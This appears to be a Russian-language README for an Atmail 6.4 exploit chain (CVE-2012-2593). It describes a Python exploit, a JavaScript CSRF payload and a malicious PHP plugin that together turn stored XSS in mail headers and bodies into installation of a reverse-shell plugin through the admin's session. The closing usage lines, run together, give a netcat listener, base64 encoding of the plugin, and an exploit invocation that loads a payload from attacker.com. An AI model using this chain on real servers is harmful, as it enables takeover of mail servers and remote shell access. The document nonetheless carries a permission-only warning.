
Atmail XSS-CSRF-RCE Exploit Chain
atmail-rce.py: Эксплуатирует CVE-2012-2593 в веб-интерфейсе Atmail.
atmail-csrf.js: JavaScript-файл, который использует CVE-2012-2593 для CSRF для установки вредоносного плагина, выполняющего обратную оболочку.
Plugin.php: Плагин Atmail, который устанавливается и вызывает обратную оболочку.
!!Используйте только против серверов, на которые у вас есть разрешение для тестирования
Почтовый сервер Atmail версии 6.4 имеет уязвимость XSS как в заголовке письма Date, так и в теле письма (через инъекцию iFrame). Это используется для CSRF с помощью JavaScript XHR API для отправки запроса с cookie администратора на веб-панель администратора, устанавливая вредоносный плагин, который выполняет код для обратной оболочки.
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/